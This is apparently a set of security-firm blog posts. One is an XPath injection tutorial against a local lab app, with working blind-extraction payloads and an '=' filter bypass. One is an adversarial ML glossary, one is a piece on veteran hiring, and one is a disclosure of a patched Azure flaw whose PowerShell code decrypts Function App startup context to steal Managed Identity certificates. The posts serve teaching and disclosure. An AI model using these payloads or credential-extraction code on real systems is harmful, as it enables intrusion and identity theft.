Back

Exploiting XPath Injection Weaknesses

Welcome to the world of XPath Injection, a significant threat in web applications. XPath Injection occurs when applications construct XPath queries for XML data without proper validation, allowing attackers to exploit user input. This vulnerability enables unauthorized access to sensitive data, authentication bypass, and application logic interference. In this blog, we delve into the depths of XPath Injection, examining its risks and consequences. Discover innovative techniques used to manipulate XPath queries and gain valuable insights. We also guide you through a sample lab environment, replicating real-world challenges faced in recent web application engagements. Stay tuned to learn how to protect your applications from this pervasive threat, ensuring robust security for your digital assets.

Setting up the Lab 

Below, I’ve provided some basic steps for setting up a vulnerable lab instance that can be used to replicate the scenarios covered in this blog.

git clone https://github.com/NetSPI/XPath-Injection-Lab.git 
cd XPath-Injection-Lab 
docker build -t bookapp .  
docker run -p 8888:80 bookapp 

Identifying XPath Injection 

After hosting the vulnerable application, configure your browser to use an intercepting web proxy (like Burp Suite), and navigate to https://localhost:8888. Click on the “Find” button, as shown in the below screenshot, and note the request in your proxy.

HTTP Request:

POST /Home/FindBook HTTP/1.1 
Host: localhost:8888 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 
Accept: */* 
Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Referer: https://localhost:8888/ 
Content-Type: application/json 
Content-Length: 28 
Origin: https://localhost:8888 
Connection: close 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin 

{"title":"The Last Orchard"}

To help identify XPath injection, an attacker can use special characters (such as ” ‘ / @ = * [ ] (  ) ) to induce a syntax error in the query. If the application returns an error message, the application may be vulnerable to XPath injection. Upon inserting a single quote [ ‘ ] into the input parameter (i.e. title) in our previous request, we can see that an XPath error was returned in the HTTP response. 

HTTP Request: 

POST /Home/FindBook HTTP/1.1 
Host: localhost:8888 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 
Accept: */* 
Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Referer: https://localhost:8888/ 
Content-Type: application/json 
Content-Length: 30 
Origin: https://localhost:8888 
Connection: close 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin 

{"title":"The Last Orchard'"}

HTTP Response:

HTTP/1.1 500 Internal Server Error 
Connection: close 
Content-Type: text/plain; charset=utf-8 
Date: Mon, 30 Oct 2023 05:54:53 GMT 
Server: Kestrel 
Content-Length: 5157 

System.Xml.XPath.XPathException: This is an unclosed string. 
   at MS.Internal.Xml.XPath.XPathScanner.ScanString() 
   at MS.Internal.Xml.XPath.XPathScanner.NextLex() 
   at MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) 
   at MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) 
   at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput) 
 
[TRUNCATED]

In the next step, try the following strings as input, and observe the responses:

' or '1'='1  
" or "1"="1  
' or '='  
" or "=" 

With the above queries, we have attempted to formulate a query that consistently evaluates to ‘true,’ with the expectation that it might bypass the intended search criteria, potentially returning unexpected records or all of the book records. But in this case, we just get an “Invalid input” response. 

HTTP Request:

POST /Home/FindBook HTTP/1.1 
Host: localhost:8888 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 
Accept: */* 
Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Referer: https://localhost:8888/ 
Content-Type: application/json 
Content-Length: 43 
Origin: https://localhost:8888 
Connection: close 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin 

{"title":"The Last Orchard ' or '1' = '1 "} 

HTTP Response:

HTTP/1.1 400 Bad Request 
Content-Length: 29 
Connection: close 
Content-Type: application/xml 
Date: Mon, 30 Oct 2023 05:59:10 GMT 
Server: Kestrel 

<Error>Invalid input.</Error> 

Whenever there is an equal sign (=), in any encoding format, within the payload, the application returns an error. In this XPath injection, the “=” sign is akin to a double-edged sword. While it serves as a fundamental component of the queries, its presence in payloads can alert security mechanisms.  

In a recently encountered injection, I faced a particularly resilient application that not only detected plain “=” signs, but also remained impervious to encoded variations. By steering away from the traditional “=“, try using “<” and “>” operators in order to bypass the “=” sign security mechanism. The updated payloads which avoid the “=” are shown below.

Note that the added extra space character before first ” ” which makes the title comparison fail too. Since neither comparison is true, no book is returned. 

HTTP Request: 

POST /Home/FindBook HTTP/1.1 
Host: localhost:8888 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 
Accept: */* 
Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Referer: https://localhost:8888/ 
Content-Type: application/json 
Content-Length: 43 
Origin: https://localhost:8888 
Connection: close 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin 

{"title":"The Last Orchard ' or '1' < '1"} 

HTTP Response:

HTTP/1.1 404 Not Found 
Content-Length: 29 
Connection: close 
Content-Type: application/xml 
Date: Mon, 30 Oct 2023 06:00:51 GMT 
Server: Kestrel 

<Error>Book not found</Error> 

HTTP Request:

POST /Home/FindBook HTTP/1.1 
Host: localhost:8888 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 
Accept: */* 
Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Referer: https://localhost:8888/ 
Content-Type: application/json 
Content-Length: 43 
Origin: https://localhost:8888 
Connection: close 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin 

{"title":"The Last Orchard ' or '1' < '2"} 

HTTP Response:

HTTP/1.1 200 OK 
Content-Length: 85 
Connection: close 
Content-Type: application/xml 
Date: Mon, 30 Oct 2023 06:01:32 GMT 
Server: Kestrel 
 
<Book published="true"><Title>Whispers in the Wind</Title><Price>12.99</Price></Book> 

Note in the examples above that the logic statement ‘ or ‘1’ < ‘2 combines a logical OR operator with a string comparison. It evaluates to true because the string ‘1’ is indeed less than the string ‘2’.  

Identifying and Stealing the Schema

What is XML Schema:

A schema defines the structure, data types, and constraints of an XML document. An XML schema provides a blueprint for the elements, attributes, and data types that are allowed in an XML document.

A basic example of an XML schema might look like this:

<root> 
        <a> 
             <b>   </b> 
        </a> 
         <c> 
              <d>  </d> 
              <e>   </e> 
              <f>  
                   <h>  </h> 
             </f> 
        </c> 
</root> 
1. Finding the Length of the Root Node’s Name 

The “root node” refers to the highest node in the XML document hierarchy. It means identifying the starting point of an XPath expression within an XML document. XPath expressions are used to navigate through elements and attributes in an XML document, and specifying the root node provides the context from which the navigation begins.  

By utilizing the string-length() function, we can determine the length of the root node’s name. This fundamental step allows us to better craft subsequent payloads. Testing different string length numbers, we can ascertain that the root node’s length to be 5 characters.

Payload:

 ' or string-length(name(/*)) < 0 or ' 

Payload Explanation:

  1. ” and “” These single quotes are used to denote string literals in XPath expressions. Anything inside single quotes is treated as a string. 
  2. or ” The or operator in XPath is used for logical OR operations. It allows the attacker to combine multiple conditions in the XPath expression. 
  3. string-length() ” This is an XPath function that calculates the length of a string. 
  4. name(/*) “ This expression represents the name of the root element in an XML document. “ /* ” selects the root node, and “ name() ” function retrieves the name of that node. 
  5. < 0 ” This part is a comparison, checking if the length of the root element’s name is less than 0. However, the length of a string cannot be less than 0, so this condition will always evaluate to false. 
  6. or ”  Similar to the first set of single quotes and the logical OR operator, these are used to close the injected expression and continue the XPath query.

Observe that the application’s content length changes in response to a request of 6. which means the root node’s length is 5. 

2. Extracting Characters from the Root Node’s Name 

Now that we know the length of the root node name, we can now use the starts-with() method to get characters from the name of the root node. As we are using start-with function we start finding root node’s name character by character.

' or starts-with(name(/*), 'B') or ' 
' or starts-with(name(/*), 'Bo') or ' 
' or starts-with(name(/*), 'Boo') or ' 
' or starts-with(name(/*), 'Book') or ' 
' or starts-with(name(/*), 'Books') or ' 

To automate the above process, I used Burp Suite’s Intruder function with the cluster bomb attack type. This allows us to determine that the name of the root node is ‘Books’.

Payload: 

 ' or starts-with(name(/*), 'AAAAA') or ' 

Payload Explanation: 

  1. ” and “” These single quotes are used to denote string literals in XPath expressions. Anything inside single quotes is treated as a string. 
  2. or ” This is a logical OR operator in XPath. It is used to combine two conditions, and the expression evaluates to true if either of the conditions is true. 
  3. starts-with(name(/*), ‘AAAAA’): This part of the payload introduces an or operator, creating a conditional expression using the starts-with() function. 
  • or ”  Similar to the first set of single quotes and the logical OR operator, these are used to close the injected expression and continue the XPath query.
  • name(/*) retrieves the name of the root node.
  1. starts-with(name(/*), ‘AAAAA’) checks if the name of the root node starts with the prefix ‘AAAAA’. If true, the entire condition evaluates to true. 

We will use the cluster bomb attack type to determine the name of the root node. Observe that the application response content length changes on the “Books” character combination.   

3. Counting the Number of Nodes Beneath the Root Node 

The count() function helps us determine the number of elements beneath the root node. This insight allows us to comprehend the structure of the XML database, paving the way for more targeted queries.

Payload:

 ' or count(/*[1]/*)<0 or ' 

Payload Explanation: 

  1. ” and “” These single quotes are used to denote string literals in XPath expressions. Anything inside single quotes is treated as a string. 
  2. or ” This is a logical OR operator in XPath. It is used to combine two conditions, and the expression evaluates to true if either of the conditions is true. 
  3. count(/*[1]/*) ” This part of the expression calculates the count of child elements of the first child of the root node of the XML document. “ /* ” selects the root node, “ [1] ” selects its first child, and “ /* “ selects all the child elements of the first child. 
  4. <0 ” This is a numerical comparison, checking if the count calculated in the previous step is less than 0. 
  5. or ”  Similar to the first set of single quotes and the logical OR operator, these are used to close the injected expression and continue the XPath query.

Please observe that the application’s content length changes in response to a request of 5, which means the node counts beneath root node is less than 5, meaning its count is 4. 

4. Finding the Character Length of the Node Beneath the Root Node

The string-length() method determines node name length. This basic phase helps us design future payloads. Testing multiple string length values, I found the node name length is 4 characters. 

Payload:

 ' or string-length(name(/*[1]/*)) < 0 or ' 

Payload Explanation: 

  1. ” and “” These single quotes are used to denote string literals in XPath expressions. Anything inside single quotes is treated as a string. 
  2. or ” The or operator in XPath is used for logical OR operations. It allows the attacker to combine multiple conditions in the XPath expression. 
  3. string-length(name(/*[1]/*)) ” This part of the expression calculates the length of the name of the first child element of the root node in the XML document. Here’s how this works: 
  • /*[1]/* ” Selects the first child element of the root node (/*[1]) and then selects all its child elements (/*). 
  • name(…) ” Gets the name of the selected element. 
  • string-length(…) ” Calculates the length of the resulting string. 
  1. < 0 ” This part is a comparison, checking if the length of the element’s name is less than 0. However, the length of a string cannot be less than 0, so this condition will always evaluate to false. 
  2. or ”  Similar to the first set of single quotes and the logical OR operator, these are used to close the injected expression and continue the XPath query or to concatenate with additional malicious condition.

Observe that the application’s content length changes in response to a request of 5, which means the node name length is 4. 

5. Extracting the Name of Node Beneath the Root Node  

We use the starts-with() method to get characters from the name of the node and extract the name of node beneath the root node.

Now that we know the length of the node name, we can now use the starts-with() method to get characters from the name of the node. As we are using the start-with function, we start finding node’s name character by character.

 ' or starts-with(name(/*[1]/*), 'B') or ' 
 ' or starts-with(name(/*[1]/*), 'Bo') or ' 
 ' or starts-with(name(/*[1]/*), 'Boo') or ' 
 ' or starts-with(name(/*[1]/*), 'Book') or '

To automate the above process, I used Burp Suite’s Intruder function with the cluster bomb attack type. This allows us to determine that the name of node beneath the root node is ‘Book’.

Payload:

' or starts-with(name(/*[1]/*), 'AAAA') or ' 

Payload Explanation: 

  1. ” and “” These single quotes are used to denote string literals in XPath expressions. Anything inside single quotes is treated as a string. 
  2. or ” The or operator in XPath is used for logical OR operations. It allows the attacker to combine multiple conditions in the XPath expression. 
  3. name(/*[1]/*) ” This part selects the name of the first child element of the root node of the XML document. “ /* ” selects the root node, “ [1] ” selects its first child, and “ /* ” again selects the first child’s first child element. 
  4. starts-with(name(/*[1]/*), ‘AAAA’) ” This checks if the name of the selected element starts with the string ‘AAAA’. The starts-with() function is used for this comparison. 
  5. The entire expression is using the logical OR operator (or) to combine conditions. It’s checking whether the name of the first child element of the root node starts with ‘AAAA’. If this condition is true, the expression evaluates to true. 
6. Extracting the Sensitive Information with the Help of XPath Injection

As you can see in step #3, the count of nodes beneath the parent node is 4, but in the application, we are able to see only 3 books. This suggests that there is one more book which cannot be found directly in the application.

Observe that when we’re searching for a book in the application, the Book XML in the response contains a “published” attribute and its value is true.

HTTP Request: 

POST /Home/FindBook HTTP/1.1 
Host: localhost:8888 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 
Accept: */* 
Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Referer: https://localhost:8888/ 
Content-Type: application/json 
Content-Length: 32 
Origin: https://localhost:8888 
Connection: close 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin 

{"title":"Whispers in the Wind"}

HTTP Response:

HTTP/1.1 200 OK 
Content-Length: 85 
Connection: close 
Content-Type: application/xml 
Date: Mon, 30 Oct 2023 06:01:32 GMT 
Server: Kestrel 

<Book published="true"><Title>Whispers in the Wind</Title><Price>12.99</Price></Book> 

To see if we can find an unpublished book, we update our XPath injection payload to search for books whose “published” attribute is “false.” Typically, we would use the “=” character as a direct comparison. But since that character is disallowed by the application, we use the “contains” function as a workaround.

Payload:

 ' or contains(@published, 'false') or' 

Payload Explanation:

  1. ” and “” These single quotes are used to denote string literals in XPath expressions. Anything inside single quotes is treated as a string. 
  2. or contains(@published, ‘false’) or’ ” This portion of the payload employs the or operator, creating a conditional expression. In this case, the condition being checked is contains(@published, ‘false’). contains(@published, ‘false’) checks if the attribute published contains the substring ‘false’. If the published attribute contains the value ‘false’, the condition evaluates to true. 
  3. or ”: This part of the payload is included to close the injected XPath expression.

For reference, here is the backend code for the application:

namespace BookFinderApp.Controllers 
{ 
    public class HomeController : Controller 
    { 
        private const string xmlString = @" 
            <Books> 
                <Book published=""true""> 
                    <Title>Whispers in the Wind</Title> 
                    <Price>12.99</Price> 
                </Book> 
                <Book published=""true""> 
                    <Title>Moonlit Secrets</Title> 
                    <Price>9.99</Price> 
                </Book> 
                <Book published=""true""> 
                    <Title>The Last Orchard</Title> 
                    <Price>24.99</Price> 
                </Book> 
                <Book published=""false""> 
                    <Title>Shadows of Tomorrow</Title> 
                    <Price>29.99</Price> 
                </Book> 
            </Books> 
        "; 

        public IActionResult Index()

This backend code proves that I was able to successfully retrieve the root node and nodes names beneath the root node. Additionally, I retrieved information about the fourth book, despite the fact it was unpublished and could not be selected directly in the application. Using these XPath injection techniques, I could extract the structure and contents of the underlying XML document and retrieve sensitive information therein.

XPath Injection Defences

Use Parameterized Queries: Employ parameterized XPath queries to separate data from code execution. 

Input Validation: Validate and sanitize user input to prevent malicious characters from being used in XPath queries. 

Least Privilege Principle: Restrict database access permissions for the application to minimize potential damage. 

Whitelist Input: Only allow specific, expected characters from user input, rejecting anything else. 

Escape Special Characters: If user input must be used in XPath, properly escape or encode special characters. 

Error Handling: Use custom error pages and avoid revealing sensitive information in error messages. 

Conclusion: Empowering Security Through Knowledge 

Understanding XPath injection and mastering the art of payload crafting are essential for securing web applications. Hopefully, this blog post has equipped you with valuable insights into XPath vulnerabilities and creative exploitation techniques. Armed with this knowledge, developers can fortify their applications against potential attacks, while security professionals can adeptly assess and mitigate XPath injection risks. 

Reference: https://book.hacktricks.xyz/pentesting-web/xpath-injection

Back

Common Terminology in Adversarial Machine Learning

Artificial Intelligence (AI) and Machine Learning (ML) have vast applications in the cyber space. With its quick adoption and limitless possibilities, the industry is in need of authorities who can provide expertise and perspective to help guide other professionals in their exploration of Large Language Models (LLMs). One of the best ways to start learning a new area is by studying the common terminology practitioners use. We created this glossary of terms to help anyone researching AI and ML to gain an understanding of discussions around Adversarial Machine Learning

Artificial Intelligence (AI) versus Machine Learning (ML) 

Before we dive in, let’s level set on the differences between AI and ML, or perhaps the lack thereof.  

Artificial Intelligence 

Artificial Intelligence is a broader field that focuses on creating machines that can perform tasks that typically require human intelligence. It aims to build systems that can reason, learn, perceive, and understand natural language, among other capabilities. AI encompasses various techniques, and machine learning is one of its subfields. 

Machine Learning 

Machine Learning is a subset of AI that deals with designing algorithms and models that enable computers to learn from data without explicit programming. Instead of being programmed with specific rules, ML models use patterns and examples to improve their performance on a given task. ML can be further divided into different categories, such as supervised learning, unsupervised learning, and reinforcement learning, each suited for different types of learning tasks. 

While they are closely related areas, they do have nuanced differences. To put it concisely, AI is a broader field that encompasses various techniques and methods to create intelligent systems, while ML is a specific approach within AI that focuses on learning from data to improve task performance. 

At this point in time, definitions within the realm of Adversarial Machine Learning (AML) lack standardization. We recognize the significance of setting clear and robust definitions to shape the future of AML, which is why our team is integrated in refining and solidifying these definitions to help establish industry standards. By leveraging NetSPI’s expertise and in-house knowledge, we strive to present definitions that are not only comprehensive but also accurate and relevant to the current state of AML.

Key Terminology in AI Cybersecurity

TermDefinition
Adversarial AttacksTechniques employed to create adversarial examples and exploit the vulnerabilities of machine learning models.
Adversarial Example DetectionMethods designed to distinguish adversarial examples from regular clean examples and prevent their misclassification.
Adversarial ExamplesAML hinges on the idea that machine learning models can be deceived and manipulated by subtle modifications to input data, known as adversarial examples. These adversarial examples are carefully crafted to cause the model to misclassify or make incorrect predictions, leading to potentially harmful consequences. Adversarial attacks can have significant implications, ranging from evading spam filters and malware detection systems to fooling autonomous vehicles’ object recognition systems.
Adversarial Learning/TrainingA learning approach that involves training models to be robust against adversarial examples or actively generating adversarial examples to evaluate the model’s vulnerability.
Adversarial Machine Learning (AML)A field that focuses on studying the vulnerabilities of machine learning models to adversarial attacks and developing strategies to enhance their security and robustness.
Adversarial PerturbationsSmall, carefully crafted changes to the input data that are imperceptible to humans but can cause significant misclassification by the machine learning model.
Adversarial Robustness EvaluationThe process of assessing the robustness of a machine learning model against adversarial attacks, often involving stress testing the model with various adversarial examples.
Adversarial TrainingA defense technique involving the augmentation of the training set with adversarial examples to improve the model’s robustness.
AutoencodersNeural network models trained to reconstruct the input data from a compressed representation, useful for unsupervised learning and dimensionality reduction tasks.
Batch NormalizationA technique used to improve the training stability and speed of neural networks by normalizing the inputs of each layer.
Bias-Variance TradeoffThe tradeoff between the model’s ability to fit the training data well (low bias) and its ability to generalize to new data (low variance).
Black-Box AttacksAdversarial attacks where the attacker has limited knowledge about the target model, usually through input-output interactions.
Certified DefensesDefense methods that provide a “certificate” guaranteeing the robustness of a trained model against perturbations within a specified bound.
Cross-Entropy LossA loss function commonly used in classification tasks that measures the dissimilarity between the predicted probabilities and the true class labels.
Data AugmentationA technique used to increase the diversity and size of the training dataset by generating new samples through transformations of existing data.
Decision BoundariesThe dividing lines or surfaces that separate different classes or categories in a classification problem. They define the regions in the input space where the model assigns different class labels to the data points. Decision boundaries can be linear or nonlinear, depending on the complexity of the classification problem and the algorithm used. The goal of training a machine learning model is to learn the optimal decision boundaries that accurately separate the different classes in the data.
Defense MechanismsTechniques and strategies employed to protect machine learning models against adversarial attacks.
DefenseGANA defense technique that uses a Generative Adversarial Network (GAN) to project adversarial perturbed images into clean images before classification.
Deep LearningA subfield of machine learning that utilizes artificial neural networks with multiple layers to learn hierarchical representations of data. 
Discriminative ModelsModels that learn the boundary between different classes or categories in the data and make predictions based on this learned decision boundary.
DropoutA regularization technique where random units in a neural network are temporarily dropped out during training to prevent over reliance on specific neurons.
Ensemble MethodsRefer to machine learning techniques that combine the predictions of multiple individual models to make more accurate and robust predictions or decisions. Instead of relying on a single model, ensemble methods leverage the diversity and complementary strengths of multiple models to improve overall performance.
Evasion AttacksAdversarial attacks aimed at perturbing input data to cause misclassification or evasion of detection systems.
Feature EngineeringThe process of selecting, transforming, and creating new features from the available data to improve the performance of a machine learning model.
Generative ModelsModels that learn the underlying distribution of the training data and generate new samples that resemble the original data distribution.
Gradient DescentAn optimization algorithm that iteratively updates the model’s parameters in the direction of steepest descent of the loss function to minimize the loss.
Gradient Masking/ObfuscationDefense methods that intentionally hide or obfuscate the gradient information of the model to make adversarial attacks less successful.
Gray-Box AttacksAdversarial attacks where the attacker has partial knowledge about the target model, such as access to some internal information or limited query access.
HyperparametersParameters that are not learned from data during the training process but are set by the user before training begins. These parameters control the behavior and performance of the machine learning model. Unlike the internal parameters of the model, which are learned through optimization algorithms, hyperparameters are predefined and chosen by the user or the machine learning engineer.
L1 and L2 RegularizationTechniques used to prevent overfitting by adding a penalty term to the model’s objective function, encouraging simplicity or smoothness.
Mean Squared Error (MSE)A commonly used loss function that measures the average squared difference between the predicted and true values.
Neural NetworksComputational models inspired by the structure and functioning of the human brain, consisting of interconnected nodes (neurons) organized in layers.
Offensive Machine Learning (OML)The practice of leveraging machine learning techniques to design and develop attacks against machine learning systems or to exploit vulnerabilities in these systems. Offensive machine learning aims to manipulate or deceive the target models, compromising their integrity, confidentiality, or availability.
OverfittingA phenomenon where a machine learning model becomes too specialized to the training data and fails to generalize well to new, unseen data.
Poisoning AttacksAdversarial attacks involving the injection of malicious data into the training set to manipulate the behavior of the model.
Precision and RecallEvaluation metrics used in binary classification tasks to measure the model’s ability to correctly identify positive samples (precision) and the model’s ability to find all positive samples (recall).
Regularization MethodsTechniques that penalize large values of model parameters or gradients during training to prevent large changes in model output with small changes in input data.
Reinforcement LearningA machine learning paradigm where an agent learns to take actions in an environment to maximize a cumulative reward signal. A learning paradigm where an agent interacts with an environment, receiving rewards or penalties based on its actions, to learn optimal policies.
Robust OptimizationDefense techniques that modify the model’s learning process to minimize misclassification of adversarial examples and improve overall robustness.
Security-Accuracy Trade-offThe trade-off between the model’s accuracy on clean data and its robustness against adversarial attacks. Enhancing one aspect often comes at the expense of the other.
Semi-Supervised LearningA learning paradigm that combines labeled and unlabeled data to improve the performance of a model by leveraging the unlabeled data to learn better representations or decision boundaries.
Supervised LearningA machine learning approach where the model learns from labeled training data, with inputs and corresponding desired outputs provided during training. 
Transfer AttacksAdversarial attacks that exploit the transferability of adversarial examples to deceive target models with limited or no direct access.
Transfer LearningA technique that leverages knowledge learned from one task to improve performance on a different but related task.
TransferabilityThe ability of adversarial examples generated for one model to deceive other similar models.
UnderfittingA phenomenon where a machine learning model fails to capture the underlying patterns in the training data, resulting in poor performance on both the training and test data.
Unsupervised LearningA machine learning approach where the model learns patterns and structures from unlabeled data without explicit output labels.
White-Box AttacksAdversarial attacks where the attacker has complete knowledge of the target model, including its architecture, parameters, and internal gradients.

Want to continue your education in Adversarial Machine Learning? Learn about NetSPI’s AI/ML Penetration Testing

Back

SHRM: Helping Veterans Find Career Success

NetSPI CEO Aaron Shilts and VP of Strategic Advisory Florindo Gallicchio share why employers should hire veterans in the workplace. On Veteran’s Day, they spoke with SHRM about the transferrable skills and between the military and cybersecurity and shared tips for job seeking veterans. Read the preview below or view the article online.

+++

Veterans put everything on the line to serve their country. Many do it with the hope of gaining skills needed for their future careers, and they believe that having military service on their resume will help them land a good job. 

However, this isn’t the reality for many veterans in the U.S. According to a study from the Pew Research Center, only 1 in 4 veterans report having a civilian job lined up for after they leave the military. Each year, nearly 200,000 veterans are on the lookout for jobs, but not all are successful. And while some do find jobs, often, they are not working in careers that match the skills they learned during their time of duty. 

Florindo Gallicchio, vice president of strategic advisory at NetSPI, said he’s found that “veterans are loyal, disciplined and dedicated to the success of their company—this comes from their focus on a mission during active duty. They’re also self-starters who can take minimal direction and run a project through to completion.” 

Across the board, it’s critical for HR and hiring managers to learn about veterans’ needs, as well as figure out how their military skills could apply in the workplace.

“Traditionally, veterans who are separating from their active-duty roles and transitioning to civilian roles don’t receive the most up-to-date information needed to look for and apply for jobs effectively,” said Aaron Shilts, CEO of NetSPI and a veteran of the Army National Guard. “Employers can help with this by not immediately overlooking resumes that cross their desks that were written with military terminology. Employers and hiring managers should dig deeper to understand the transferable skills veterans possess.”

You can read the full article at https://www.shrm.org/resourcesandtools/hr-topics/employee-relations/pages/helping-veterans-find-career-success.aspx!

Back

Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps 

As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized. 

TL;DR 

  1. The Linux containers in Azure Function Apps utilize an encrypted start up context file hosted in Azure Storage Accounts
  2. The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
  3. This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of the November 11, 2023, this issue has been fully addressed by Microsoft. 

In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App. 

As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.  

Here is the PowerShell sample code that we started with:

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".") 

$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY) 
$iv = [System.Convert]::FromBase64String($encryptedContext[0]) 
$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1]) 

$aes = [System.Security.Cryptography.AesManaged]::new() 
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC 
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 
$aes.Key = $key 
$aes.IV = $iv 

$decryptor = $aes.CreateDecryptor() 
$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) 
$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes) 

$body =  $plainText 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
})

At a high-level, this PowerShell code takes in the environmental variable for the SAS tokened URL and gathers the encrypted context to a variable. We then set the decryption key to the corresponding environmental variable, the IV to the start section of the of encrypted context, and then we complete the AES decryption, outputting the fully decrypted context to the HTTP response. 

When building this code, we used an existing Function App in our subscription that had a managed Identity attached to it. Upon inspection of the decrypted startup context, we noticed that there was a previously unnoticed “MSISpecializationPayload” section of the configuration that contained a list of Identities attached to the Function App. 

"MSISpecializationPayload": { 
    "SiteName": "notarealfunctionapp", 
    "MSISecret": "57[REDACTED]F9", 
    "Identities": [ 
      { 
        "Type": "SystemAssigned", 
        "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", 
        "ResourceId": "", 
        "Certificate": "MIIK[REDACTED]H0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      }, 
      { 
        "Type": "UserAssigned", 
        "ClientId": "[REDACTED]", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", 
        "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", 
        "Certificate": "MIIK[REDACTED]0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      } 
    ], 
[Truncated]

In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.  

$b64 = " MIIK[REDACTED]H0A==" 

[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c). 

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c).

After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.

PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account				             SubscriptionName    TenantId       Environment
-------      				     ----------------    ---------      -----------
b1abdc5c-3e68-476a-9191-428c1300c50c         Research 	         [REDACTED]	AzureCloud

